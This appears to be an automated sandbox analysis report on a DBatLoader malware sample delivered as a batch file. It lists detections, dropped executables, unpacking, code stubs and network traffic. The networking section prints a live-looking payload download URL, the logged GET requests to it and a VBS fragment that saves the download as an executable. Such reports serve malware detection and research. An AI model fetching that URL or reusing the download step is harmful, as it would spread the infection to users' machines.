                      Source: Oupzhkpr.PIF.6.drMalware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 47%
                      Multi AV Scanner detection for submitted file
                      Source: PO#3_RKG367.batReversingLabs: Detection: 23%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack
                      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49866 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49813 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFA9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: rpkhzpuO.pif, 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000003.2636484466.000000002FFF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000006.00000003.2437138708.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437138708.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.0000000000723000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.00000000006FA000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_02C358B4
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 00F17394h12_2_00F17099
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 00F17CDCh12_2_00F17A7A
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_00F17E58
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_00F17E4C
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00BB9731h13_2_00BB9480
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00BB9E5Ah13_2_00BB9A40
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00BB9731h13_2_00BB35FD
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00BB9E5Ah13_2_00BB9A30
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 00BB9E5Ah13_2_00BB9D87
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C62B5h13_2_051C60D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C6C3Fh13_2_051C60D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C3840h13_2_051C3598
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C18A0h13_2_051C15F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C26E0h13_2_051C2438
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov esp, ebp13_2_051C947A
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C0740h13_2_051C0498
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C49A0h13_2_051C46F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C33E8h13_2_051C3140
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C1448h13_2_051C11A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_051C51E8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C02E8h13_2_051C0040
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C4548h13_2_051C42A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C0FF0h13_2_051C0D48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C2F90h13_2_051C2CE8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C40F0h13_2_051C3E48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C2152h13_2_051C1EA8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_051C59FB
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C3C98h13_2_051C39F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_051C581B
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C2B38h13_2_051C2890
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C0B98h13_2_051C08F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C4DF8h13_2_051C4B50
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 051C1CF8h13_2_051C1A50
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 4x nop then jmp 0584BCBDh30_2_0584BA40
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 4x nop then jmp 0584BCBDh30_2_0584BD43

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                      Potential malicious VBS script found (has network functionality)
                      Source: C:\Windows\System32\cmd.exeDropped file: b.SaveToFile p+"\x.exe",2'vJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4E2F8 InternetCheckConnectionA,6_2_02C4E2F8
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                      Source: Joe Sandbox ViewASN Name: GridhostZA GridhostZA
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49813 -> 41.185.8.252:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49860 -> 158.101.44.242:80
                      Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49866 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: lwaziacademy.com
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                      Source: Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
